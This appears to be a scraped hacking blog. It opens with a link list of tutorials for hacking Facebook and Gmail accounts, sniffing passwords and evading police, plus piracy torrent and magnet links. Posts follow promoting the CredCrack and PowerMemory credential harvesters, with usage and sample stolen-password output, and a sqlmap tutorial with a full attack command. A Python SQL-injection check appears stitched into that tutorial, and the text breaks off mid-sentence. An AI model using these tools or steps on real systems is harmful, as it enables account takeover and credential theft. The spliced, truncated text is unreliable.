How to use HarVester tool in Kali Linux<br />
https://www.youtube.com/watch?v=lohGefBjOI8<br />
<br />
Explanation of the meaning of BIOS text messages<br />
http://archsterowniki.ucoz.com/publ/dla_mlodych_informatykow/komunikaty_tekstowe_bios/17-1-0-444<br />
<br />
How to turn your smartphone into computer webcam<br />
http://www.technotification.com/2014/11/smartphone-as-webcam-you-gotta-be-kidding-me.html<br />
<br />
Conclusion about Black Hat Style tutorials<br />
http://pastebin.com/h43WBzGy<br />
<br />
Good linux torrent clients<br />
----------------------------<br />
http://deluge-torrent.org/ <--- been told this is the best torrent client ever to come to Linux, and i have to agree<br />
<br />
http://www.qbittorrent.org/ <--- i use this, its pretty great<br />
<br />
Look into Rtorrent as well <br />
<br />
20 things to do after installing Kali Linux <br />
---------------------------------------------------<br />
http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/<br />
<br />
<br />
Coding challenges and resources that will make you an expert coder <br />
--------------------------------------------------------<br />
https://github.com/karan/Projects<br />
<br />
http://codingbat.com/<br />
<br />
http://rosettacode.org/wiki/Category:Programming_Tasks<br />
<br />
http://www.reddit.com/r/beginnerprojects<br />
<br />
https://github.com/karan/Projects-Solutions/blob/master/README.md<br />
<br />
https://www.daniweb.com/software-development/python/threads/131973/5-crucial-projects-for-beginners<br />
<br />
http://inventwithpython.com/blog/2012/02/20/i-need-practice-programming-49-ideas-for-game-clones-to-code/<br />
<br />
http://theinternetwishlist.com/<br />
<br />
http://www.ideamachine.io/<br />
<br />
http://blog.programmersmotivation.com/2014/07/09/list-projects/<br />
<br />
How to compile a linux program from source <br />
-------------------------------------------<br />
https://www.youtube.com/watch?v=C7_5zsaQlFE<br />
<br />
torrent websites <br />
------------------------------------<br />
https://kickass.so/<br />
<br />
https://oldpiratebay.org/<br />
<br />
Magnet links to VERRYYY big files with libraries of information<br />
-------------------------------------------------------------------<br />
magnet:?xt=urn:btih:0bbfaaf5f469a2bd3d762f6942a302f7014a35e9&dn=Gentoomen%20Library&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%20%2Ftracker.ccc.de%3A80 (/G/entooman's library, 32 GB of computer information from A-Z, a bit outdated)<br />
<br />
(75 gig file full of every instruction and guide posted on halfchan /k/, a /k/omando's dream)<br />
magnet:?xt=urn:btih:J3ZVT72VI4MJB5QGET2IKTU6XNRPSJZD&dn=Mega%20Folder&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce&tr=http%3a%2f%2ftracker.best-torrents.net%3a6969%2fannounce&tr=http%3a%2f%2fwww.eddie4.nl%3a6969%2fannounce&tr=udp%3a%2f%2fopen.demonii.com%3a1337&tr=udp%3a%2f%2ftracker.ccc.de%3a80&tr=udp%3a%2f%2ftracker-ccc.de%3a6969&tr=udp%3a%2f%2ffr33domtracker.h33t.com%3a3310%2fannounce&tr=udp%3a%2f%2ftracker.istole.it%3a6969&tr=udp%3a%2f%2ftracker.istole.it%3a80%2fannounce<br />
<br />
magnet:?xt=urn:btih:c09013f19e37e8aae5465565fd1b266931179c44&dn=The%20Ultimate%20IT%20Ebooks%20Collection%20-%201800%2b%20IT%20and%20Computer%20Science%20Ebooks%20from%20http_%e2%81%84%e2%81%84it-ebooks.info <--- 1800 IT related<br />
books, some seed it for fucks sake<br />
<br />
Linux eBooks Collection [PDF]<br />
<br />
magnet:?xt=urn:btih:807b42a48a011e68e23a8ba4ccdc699057944c16&dn=Linux%20eBooks%20Collection%20%5bPDF%5d<br />
<br />
Narzew tutorials <br />
--------------------------------------------------------------------------------------------------------------------------------------------<br />
Kali Linux Cookbook<br />
Over 70 recipes to help you master Kali Linux for effective penetration testing<br />
http://hacktut.ugu.pl/?id=17<br />
http://sh.st/udWE4<br />
<br />
Black Hat Style - Tor Only Environment<br />
How to configure Tor Only Environment<br />
http://hacktut.ugu.pl/?id=41<br />
http://sh.st/ulCL3<br />
<br />
Hacking Facebook with SET Phishing<br />
How to hack Facebook account using SE-Toolkit on Kali Linux<br />
http://hacktut.ugu.pl/?id=18<br />
http://sh.st/udEmQ<br />
<br />
Search Engine Dorking<br />
Tutorial about Search Engine Dorking<br />
http://hacktut.ugu.pl/?id=22<br />
http://sh.st/uhRq7<br />
<br />
Using XChat with Tor<br />
How to IRC anonymously with XChat+Tor<br />
http://hacktut.ugu.pl/?id=44<br />
http://sh.st/ulM5K<br />
<br />
Attacks on Windows 95/98<br />
A few attacks on an older version of the Windows operating system<br />
http://hacktut.ugu.pl/?id=12<br />
http://sh.st/uaCps<br />
<br />
Black Hat Style - Tor Daily Usage<br />
Daily usage of Tor<br />
http://hacktut.ugu.pl/?id=40<br />
http://sh.st/ulCKu<br />
<br />
Black Hat Style - Installing Firewall<br />
How to install firewall on Linux machine<br />
http://hacktut.ugu.pl/?id=32<br />
http://sh.st/ulAsf<br />
<br />
Hacking Facebook account<br />
4 ways to hack Facebook account<br />
http://hacktut.ugu.pl/?id=6<br />
http://sh.st/uuVvJ<br />
<br />
Black Hat Style - Installing IRC client on Linux machine<br />
How to install IRC client on Linux machine<br />
http://hacktut.ugu.pl/?id=37<br />
http://sh.st/ulHCG<br />
<br />
BIOS text messages<br />
Explanation of the meaning of BIOS text messages<br />
http://hacktut.ugu.pl/?id=39<br />
http://sh.st/ulKx2<br />
<br />
SQLMap For Dummies<br />
How to use SQLMap tool<br />
http://hacktut.ugu.pl/?id=21<br />
http://sh.st/uhELL<br />
<br />
Hacking Linux Exposed - 3rd Edition<br />
Linux Security Secrets and Solutions<br />
http://hacktut.ugu.pl/?id=16<br />
http://sh.st/udWWZ<br />
<br />
Hacking Basics<br />
A dozen or so hacking terms that everyone starting out with hacking should know<br />
http://hacktut.ugu.pl/?id=14<br />
http://sh.st/uaCpf<br />
<br />
Black Hat Style - Firewall Configuration<br />
How to configure firewall<br />
http://hacktut.ugu.pl/?id=33<br />
http://sh.st/ulAgn<br />
<br />
Hacking remote computer with IP address<br />
How to hack remote computer if you know an IP address ;)<br />
http://hacktut.ugu.pl/?id=19<br />
http://sh.st/udEBi<br />
<br />
Black Hat Style - Securing Hard Drive<br />
How to secure hard drive with TrueCrypt<br />
http://hacktut.ugu.pl/?id=25<br />
http://sh.st/ukMqL<br />
<br />
Ping Tutorial<br />
How to use Ping tool in Linux<br />
http://hacktut.ugu.pl/?id=9<br />
http://sh.st/uaov1<br />
<br />
Your Own Programming Language, Part 2<br />
How to build your own programming language based on Ruby. Part II - creating a language compiled to pseudocode<br />
http://hacktut.ugu.pl/?id=47<br />
http://sh.st/uzqSi<br />
<br />
Black Hat Style - Shredding Free Space<br />
How to shred free space<br />
http://hacktut.ugu.pl/?id=28<br />
http://sh.st/ukMoF<br />
<br />
NMap - A Stealth Port Scanner<br />
Tutorial about using NMap port scanner<br />
http://hacktut.ugu.pl/?id=10<br />
http://sh.st/uaov2<br />
<br />
Black Hat Style - Tor for Windows<br />
Installing Tor for Windows<br />
http://hacktut.ugu.pl/?id=24<br />
http://sh.st/ukXtT<br />
<br />
Black Hat Style - Installing Torchat<br />
How to install Torchat<br />
http://hacktut.ugu.pl/?id=38<br />
http://sh.st/ulKlf<br />
<br />
Black Hat Style - How to secure your computer and surf anonymously<br />
How to secure your computer and surf completely anonymous<br />
http://hacktut.ugu.pl/?id=29<br />
http://sh.st/ukMAs<br />
<br />
Sniffing logins and passwords<br />
Sniffing logins and passwords<br />
http://hacktut.ugu.pl/?id=20<br />
http://sh.st/udRFG<br />
<br />
Hacking Gmail<br />
4 ways hacking Gmail account<br />
http://hacktut.ugu.pl/?id=8<br />
http://sh.st/uaovM<br />
<br />
Black Hat Style - Conclusion<br />
Conclusion about Black Hat Style tutorials<br />
http://hacktut.ugu.pl/?id=42<br />
http://sh.st/ulCXW<br />
<br />
IRC Channel Operator Tutorial<br />
How to admin an IRC channel :)<br />
http://hacktut.ugu.pl/?id=43<br />
http://sh.st/ulM2O<br />
<br />
Remote File Inclusion<br />
RFI Tutorial<br />
http://hacktut.ugu.pl/?id=23<br />
http://sh.st/ukKaj<br />
<br />
Black Hat Style - Ubuntu Configuration<br />
How to configure Ubuntu<br />
http://hacktut.ugu.pl/?id=35<br />
http://sh.st/ulFe9<br />
<br />
Black Hat Style - Setting up TrueCrypt, Encrypted Hidden Volumes<br />
How to create encrypted hidden volumes in TrueCrypt<br />
http://hacktut.ugu.pl/?id=26<br />
http://sh.st/ukMrt<br />
<br />
Parameter Delimiter Attack in Practice<br />
Video tutorial showing a practical application of the Parameter Delimiter attack<br />
http://hacktut.ugu.pl/?id=2<br />
http://sh.st/uuDOc<br />
<br />
Black Hat Style - Installing VirtualBox on Windows<br />
How to install VirtualBox on Windows<br />
http://hacktut.ugu.pl/?id=31<br />
http://sh.st/uk1KZ<br />
<br />
SQL Injection Step-By-Step<br />
Step-By-Step SQL Injection<br />
http://hacktut.ugu.pl/?id=7<br />
http://sh.st/up5dW<br />
<br />
DNS Enumeration in Practice<br />
Video tutorial showing how to use the dnsdict6 program to perform DNS enumeration<br />
http://hacktut.ugu.pl/?id=1<br />
http://sh.st/y3PEm<br />
<br />
HPing3 Tutorial<br />
Using HPing3 tool in Kali Linux<br />
http://hacktut.ugu.pl/?id=4<br />
http://sh.st/uuLOI<br />
<br />
Black Hat Style - HD CleanUp Windows<br />
How to clean up traces in Windows<br />
http://hacktut.ugu.pl/?id=27<br />
http://sh.st/ukMtH<br />
<br />
Resetting Windows Administrator Password<br />
How to reset Windows admin password using Linux :)<br />
http://hacktut.ugu.pl/?id=45<br />
http://sh.st/ulMN4<br />
<br />
Brutus AET2<br />
Usage of Brutus AET2<br />
http://hacktut.ugu.pl/?id=11<br />
http://sh.st/uaCtE<br />
<br />
Sniffing Passwords using Cain<br />
How to sniff passwords using Cain<br />
http://hacktut.ugu.pl/?id=15<br />
http://sh.st/uaCRc<br />
<br />
THC-IPv6 Tutorial<br />
How to use THC-IPv6 toolset<br />
http://hacktut.ugu.pl/?id=5<br />
http://sh.st/uuZLy<br />
<br />
Black Hat Style - Installing Ubuntu<br />
How to install Ubuntu<br />
http://hacktut.ugu.pl/?id=34<br />
http://sh.st/ulF02<br />
<br />
DNS Enumeration using DNSMap<br />
How to enumerate DNS using DNSMap on Kali Linux<br />
http://hacktut.ugu.pl/?id=3<br />
http://sh.st/uuKcI<br />
<br />
Hiding File Extensions<br />
Or how one ends up opening an .exe file thinking it is a .jpg<br />
http://hacktut.ugu.pl/?id=13<br />
http://sh.st/uaCpd<br />
<br />
Your Own Programming Language, Part 1<br />
How to build your own programming language based on Ruby. Part I - creating an interpreted language<br />
http://hacktut.ugu.pl/?id=46<br />
http://sh.st/ul9rT<br />
<br />
Black Hat Style - Installing VirtualBox Guest Additions<br />
How to install Guest Additions in Virtualbox<br />
http://hacktut.ugu.pl/?id=36<br />
http://sh.st/ulFBU<br />
<br />
Anti-Police Tutorial<br />
How to protect yourself from police<br />
http://hacktut.ugu.pl/?id=30<br />
<br />
<br />
<br />
ONLINE COMPILERS <br />
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />
http://ideone.com/<br />
<br />
http://codepad.org/<br />
<br />
<br />
<br />
FREE ONLINE EBOOKS<br />
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br />
<br />
it-ebooks.info <---Dedicated to only IT books; very fast; unlimited downloads.<br />
<br />
bookzz.org<br />
booksc.org<br />
bookos-z1.org<br />
^All of them are sisters; huge and rapidly increasing resources of everything (at the present nearly 2.5 million books are available); free users are limited to 10 (actually 9 !!) books per day.<br />
<br />
freescienceengineering.library.elibgen.org <------Another great resource; however most of the books are outdated,be warned!</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com161tag:blogger.com,1999:blog-4509349481580895365.post-91627120267134864322015-08-31T17:40:00.002+05:302015-08-31T17:40:31.918+05:30How to steal windows passwords from domain<div dir="ltr" style="text-align: left;" trbidi="on">
<h1>
CredCrack</h1>
<h2>
Introduction</h2>
<hr />
CredCrack is a fast and stealthy credential harvester. It exfiltrates
credentials recursively in memory and in the clear. Upon completion,
CredCrack will parse and output the credentials while identifying any
domain administrators obtained. CredCrack also comes with the ability to
list and enumerate share access and yes, it is threaded!<br />
CredCrack has been tested and runs with the tools found natively in
Kali Linux. CredCrack solely relies on having PowerSploit's
"Invoke-Mimikatz.ps1" under the /var/www directory. <a href="https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1">Download Invoke-Mimikatz Here</a><br />
<h2>
Help</h2>
<hr />
<pre><code>usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE File containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
</code></pre>
<h2>
Examples</h2>
<hr />
<h3>
Enumerating Share Access</h3>
<pre><code>./credcrack.py -r 192.168.1.100 -d acme -u bob --es
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Validating 192.168.1.100
-----------------------------------------------------------------
192.168.1.102 - Windows 7 Professional 7601 Service Pack 1
-----------------------------------------------------------------
OPEN \\192.168.1.102\ADMIN$
OPEN \\192.168.1.102\C$
-----------------------------------------------------------------
192.168.1.103 - Windows Vista (TM) Ultimate 6002 Service Pack 2
-----------------------------------------------------------------
OPEN \\192.168.1.103\ADMIN$
OPEN \\192.168.1.103\C$
CLOSED \\192.168.1.103\F$
-----------------------------------------------------------------
192.168.1.100 - Windows Server 2008 R2 Enterprise 7601 Service Pack 1
-----------------------------------------------------------------
CLOSED \\192.168.1.100\ADMIN$
CLOSED \\192.168.1.100\C$
OPEN \\192.168.1.100\NETLOGON
OPEN \\192.168.1.100\SYSVOL
[*] Done! Completed in 0.8s
</code></pre>
<h3>
Harvesting credentials</h3>
<hr />
<pre><code>./credcrack.py -f hosts -d acme -u bob -l 192.168.1.100
Password:
---------------------------------------------------------------------
CredCrack v1.1 by Jonathan Broche (@g0jhonny)
---------------------------------------------------------------------
[*] Setting up the stage
[*] Validating 192.168.1.102
[*] Validating 192.168.1.103
[*] Querying domain admin group from 192.168.1.102
[*] Harvesting credentials from 192.168.1.102
[*] Harvesting credentials from 192.168.1.103
The loot has arrived...
__________
/\____;;___\
| / /
`. ())oo() .
|\(%()*^^()^\
%| |-%-------|
% \ | % )) |
% \|%________|
[*] Host: 192.168.1.102 Domain: ACME User: jsmith Password: Good0ljm1th
[*] Host: 192.168.1.103 Domain: ACME User: daguy Password: P@ssw0rd1!
1 domain administrators found and highlighted in yellow above!
[*] Cleaning up
[*] Done! Loot may be found under /root/CCloot folder
[*] Completed in 11.3s
</code></pre>
<h4>
Download credcrack from <a href="https://github.com/gojhonny/CredCrack" target="_blank">here</a></h4>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com15tag:blogger.com,1999:blog-4509349481580895365.post-56605142191851010212015-08-31T15:47:00.001+05:302015-08-31T15:47:31.329+05:30Power Memory : Tutorial <div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
This post explains how to use the PowerMemory script to reveal the
passwords used by users of the computers running under Windows systems.</h2>
<u><i>Disclaimer</i></u><br />
<i>Any actions and/or activities related to the material contained
within this blog are solely your responsibility. The misuse of the
information in this website can result in criminal charges brought
against the persons in question. The authors will not be held
responsible in the event any criminal charges be brought against any
individuals misusing the information in this website to break the law.</i><i><br />
</i><i>This script is published for educational use only. I am in no way responsible for any misuse of the information.</i><i><br />
</i><i>This article is related to Computer Security and I do not promote hacking / cracking / software piracy.</i><i><br />
</i><i>This article is not a GUIDE of Hacking. It only provides
information about the legal ways of retrieving the passwords. You shall
not misuse the information to gain unauthorised access. However you may
try out these hacks on your own computer at your own risk. Performing
hack attempts (without permission) on computers that you do not own is
illegal.</i><br />
Today I want to present a powerful script dubbed PowerMemory that
allows pen testers to extract user credentials present in memory and
files. PowerMemory is a script <a href="http://sysadminconcombre.blogspot.ca/2015/07/how-to-hack-windows-password.html" target="_blank">developed</a> by
Pierre-Alexandre Braeken as a proof of concept of how to retrieve
Windows credentials with PowerShell and CDB Command-Line Options
(Windows Debuggers). It works on Windows OS from Windows 2003 to 2012
and according to the author it is able to retrieve credentials also from
Windows 10.<br />
PowerMemory was tested on 2003, 2008r2, 2012, 2012r2 and Windows 7 – 32 and 64 bits, Windows 8 and Windows 10 Home edition.<br />
<em><strong>Features</strong>:</em><br />
<em>+ it’s fully PowerShell</em><br />
<em>+ it can work locally, remotely or from a dump file collected on a machine</em><br />
<em>+ it does not use the operating system .dll to locate credentials address in memory but a simple Microsoft debugger</em><br />
<em>+ it does not use the operating system .dll to </em>decipher<em> passwords collected –> it is done in PowerShell (AES, TripleDES, DES-X)</em><br />
<em>+ it breaks undocumented Microsoft DES-X</em><br />
<em>+ it works even if you are on a different architecture than the target</em><br />
<em>+ it leaves no trace in memoryless</em><br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/PowerMemory.jpg"><img alt="PowerMemory" class="aligncenter wp-image-39725" height="269" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/PowerMemory.jpg" width="500" /></a><br />
<br />
The steps necessary to use PowerMemory and retrieve user credentials are:<br />
1) Download the tool<br />
2) Extract the files contained in the ZIP archive<br />
3) Execute PowerShell with Administrator Rights<br />
4) Prepare your environment (Enter this command: “Set-ExecutionPolicy Unrestricted -force” and press <b>Enter</b>)<br />
5) Open the tool in PowerShell (Browse to the place where you extracted
the tool you downloaded in step 1 and click
on Reveal-MemoryCredentials.ps1 and then on Open).<br />
6) Launch the tool<br />
7) Get password<br />
<a href="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/resultWindows8-PowerMemory.png"><img alt="resultWindows8 PowerMemory" class="aligncenter wp-image-39726" height="266" src="http://securityaffairs.co/wordpress/wp-content/uploads/2015/08/resultWindows8-PowerMemory.png" width="499" /></a><br />
<strong>The PowerMemory tool is available for download at </strong><a href="https://codeload.github.com/giMini/PowerMemory/zip/master" rel="nofollow" target="_blank">PowerMemory.zip(1.32 MB)</a> | Clone <a href="https://github.com/giMini/PowerMemory" rel="nofollow" target="_blank">Url</a><br />
Meanwhile, its source is available on GitHub at <a href="https://github.com/giMini" rel="nofollow" target="_blank">https://github.com/giMini</a>.</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com95tag:blogger.com,1999:blog-4509349481580895365.post-45782942025047394262015-08-28T12:06:00.001+05:302015-08-28T12:08:02.662+05:30Sql injection Tutorial<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
If you have been wondering how to simulate SQL injection, or how to attack/test a website using SQL injection, this article is for you.<br />
<br />
There are several tools to perform SQL injection, but in order to automate it there are tools like sqlmap, bbqsql, etc.<br />
<br />
<b>SQLMap Tutorial</b> :<br />
<br />
For reference, a sqlmap cheatsheet is available <a href="https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CB4QFjAAahUKEwi8t9Slk8vHAhUSj44KHVEnAe4&url=https%3A%2F%2Fpacketstormsecurity.com%2Ffiles%2F127647%2FSQLmap-Cheatsheet-1.0.html&ei=yP_fVbyzLpKeugTRzoTwDg&usg=AFQjCNFghMHrCqD0zYKrfkArm1HR6FGSCQ&sig2=u_jRWb7T1p-Xs6ZNnoeByA" target="_blank">here </a><br />
<br />
A simple command to test with sqlmap is as follows:<br />
<br />
<pre>python sqlmap.py -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2 \
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=3 --banner --is-dba --dbs --tables --technique=BEUST \
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt</pre>
<br />
If you are using Kali Linux, paste this into a terminal (all on a single line):<br />
<blockquote class="tr_bq">
<br />
sqlmap -v 2 --url=http://mysite.com/index --user-agent=SQLMAP --delay=1 --timeout=15 --retries=2
--keep-alive --threads=5 --eta --batch --dbms=MySQL --os=Linux --level=5 --risk=3 --banner --is-dba --dbs --tables --technique=BEUST
-s /tmp/scan_report.txt --flush-session -t /tmp/scan_trace.txt --fresh-queries > /tmp/scan_out.txt </blockquote>
From OWASP, the explanation is as follows:<br />
<br />
<br />
<br />
<b>Options used to specify HTTP communication behaviors:</b>
<br />
<ul>
<li> -v: Set the verbosity level of output messages (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.1" rel="nofollow">Option details section</a>).
</li>
<li> --url: Run sqlmap against a single target URL (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.2" rel="nofollow">Option details section</a>).
</li>
<li> --user-agent: Providing custom User-Agent (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --delay: Number of seconds to hold between each HTTP(S) request (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --timeout: Number of seconds to wait before considering the HTTP(S) request timed out (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --retries: Maximum number of retries when the HTTP(S) connection times out (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.3" rel="nofollow">Option details section</a>).
</li>
<li> --keep-alive: Use persistent HTTP(s) connections (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.4" rel="nofollow">Option details section</a>).
</li>
<li> --threads: Maximum number of concurrent HTTP(S) requests that sqlmap is allowed to do (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.4" rel="nofollow">Option details section</a>).
</li>
<li> --eta: Calculate and show in real time the estimated time of
arrival to retrieve each query output. This is shown when the technique
used to retrieve the output is any of the blind SQL injection type (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --batch: This will leave sqlmap to go with a default behaviour whenever user's input would be required (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
</ul>
<br />
<b>Options used to specify audit behaviors:</b>
<br />
<ul>
<li> --dbms: Force back-end DBMS to this value (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.5" rel="nofollow">Option details section</a>).
</li>
<li> --os: Force back-end DBMS operating system to this value (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.5" rel="nofollow">Option details section</a>).
</li>
<li> --level: Level of tests to perform from 1 to 5, default is 1 (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.6" rel="nofollow">Option details section</a>).
</li>
<li> --risk: Specifies the risk of tests to perform from 1 to 3, default is 1 (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.6" rel="nofollow">Option details section</a>).
</li>
<li> --banner: Try to retrieve the database management systems product banner (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --is-dba: Detect if the current database management system session user is a database administrator (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --dbs: Try to enumerate the list of databases (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --tables: Try to enumerate DBMS database tables (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.9" rel="nofollow">Option details section</a>).
</li>
<li> --technique: SQL injection techniques to test for, default is BEUST (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.7" rel="nofollow">Option details section</a>),
<ul>
<li> B: Boolean-based blind SQL injection
</li>
<li> E: Error-based SQL injection
</li>
<li> U: UNION query SQL injection
</li>
<li> S: Stacked queries SQL injection
</li>
<li> T: Time-based blind SQL injection
</li>
</ul>
</li>
</ul>
<br />
<b>Options used to specify scan information saving behaviors:</b>
<br />
<ul>
<li> -s: Save and resume all data retrieved on a session file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --flush-session: Flush the content of file specified by '-s' in
order to avoid the caching mechanisms implemented by default in sqlmap (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> -t: Log all HTTP traffic into a textual file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
<li> --fresh-queries: Ignores query results stored in session file (<a class="external text" href="http://sqlmap.sourceforge.net/doc/README.html#toc5.15" rel="nofollow">Option details section</a>).
</li>
</ul>
<br />
Extract from SQLMap documentation about SQL injection techniques identified by B/E/U/S/T (<a class="external free" href="http://sqlmap.sourceforge.net/doc/README.html#toc1.3" rel="nofollow">http://sqlmap.sourceforge.net/doc/README.html#toc1.3</a>):
<br />
<pre>[B]oolean-based blind SQL injection, also known as inferential SQL injection: sqlmap replaces or appends to the affected parameter
in the HTTP request, a syntactically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose
output the user wants to retrieve. For each HTTP response, by making a comparison between the HTTP response headers/body with
the original request, the tool infers the output of the injected statement character by character. Alternatively, the user can
provide a string or regular expression to match on True pages. The bisection algorithm implemented in sqlmap to perform this technique
is able to fetch each character of the output with a maximum of seven HTTP requests. Where the output is not within the clear-text plain
charset, sqlmap will adapt the algorithm with bigger ranges to detect the output.

[E]rror-based SQL injection: sqlmap replaces or appends to the affected parameter a database-specific syntactically wrong statement and
parses the HTTP response headers and body in search of DBMS error messages containing the injected pre-defined chain of characters and
the statement output within. This technique works when the web application has been configured to disclose back-end database management
system error messages only.

[U]NION query SQL injection, also known as inband SQL injection: sqlmap appends to the affected parameter a syntactically valid SQL statement
string starting with a UNION ALL SELECT. This technique works when the web application page passes the output of the SELECT statement within
a for cycle, or similar, so that each line of the query output is printed on the page content. sqlmap is also able to exploit partial
(single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct
whereas only the first entry of the query output is displayed.

[S]tacked queries SQL injection, also known as multiple statements SQL injection: sqlmap tests if the web application supports stacked queries
then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be
executed. This technique is useful to run SQL statements other than SELECT like, for instance, data definition or data manipulation statements
possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database
management system and the session user privileges.

[T]ime-based blind SQL injection, also known as full blind SQL injection: sqlmap replaces or appends to the affected parameter in the HTTP request,
a syntactically valid SQL statement string containing a query which puts on hold the back-end DBMS to return for a certain number of seconds.
For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool infers the output of
the injected statement character by character. Like for boolean-based technique, the bisection algorithm is applied.
</pre>
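A regression check for the B, E and U signals described in the extract above, added here as an example (it is not code from OWASP or sqlmap): it runs a concatenated query and a parameter-bound query against a constructed in-memory SQLite table and reports which signals each one exposes. The function names, the table and the canary string are assumptions made for illustration; stacked-query and time-based probes are left out.

```python
import sqlite3

# Constructed marker that never occurs in the sample data (assumption).
CANARY = "zz-canary-zz"


def make_db():
    """Build a constructed in-memory table standing in for the application data."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO articles VALUES (1, 'Welcome'), (2, 'Release notes');"
    )
    return db


def render(db, query, params=()):
    """Render a 'page': one title per line, or the DBMS error text.

    Echoing the DBMS error is the misconfiguration the error-based
    technique relies on; it is kept so the check below can observe it.
    """
    try:
        rows = db.execute(query, params).fetchall()
    except sqlite3.Error as exc:
        return "DB error: %s" % exc
    return "\n".join(row[0] for row in rows)


def page_concatenated(db, article_id):
    # Weak form: the request parameter becomes part of the SQL text.
    return render(db, "SELECT title FROM articles WHERE id = " + article_id)


def page_bound(db, article_id):
    # Corrected form: the parameter is passed as data through a placeholder.
    return render(db, "SELECT title FROM articles WHERE id = ?", (article_id,))


def injection_signals(page, db):
    """Report which of the B/E/U signals a handler exposes.

    B: a true condition and a false condition give different pages.
    E: a syntactically wrong value surfaces a DBMS error in the page.
    U: a row appended with UNION ALL SELECT shows up in the page.
    """
    true_page = page(db, "1 AND 1=1")
    false_page = page(db, "1 AND 1=2")
    return {
        "B": true_page != false_page,
        "E": page(db, "1'").startswith("DB error"),
        "U": CANARY in page(db, "0 UNION ALL SELECT '%s'" % CANARY),
    }


if __name__ == "__main__":
    db = make_db()
    for handler in (page_concatenated, page_bound):
        print(handler.__name__, injection_signals(handler, db))
```

A handler that reports any signal as True is building SQL from request data and should be moved to placeholders before the audit is re-run.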
<h2>
<span class="mw-headline" id="Report">Report</span></h2>
The Python script below can be used to generate an HTML report from
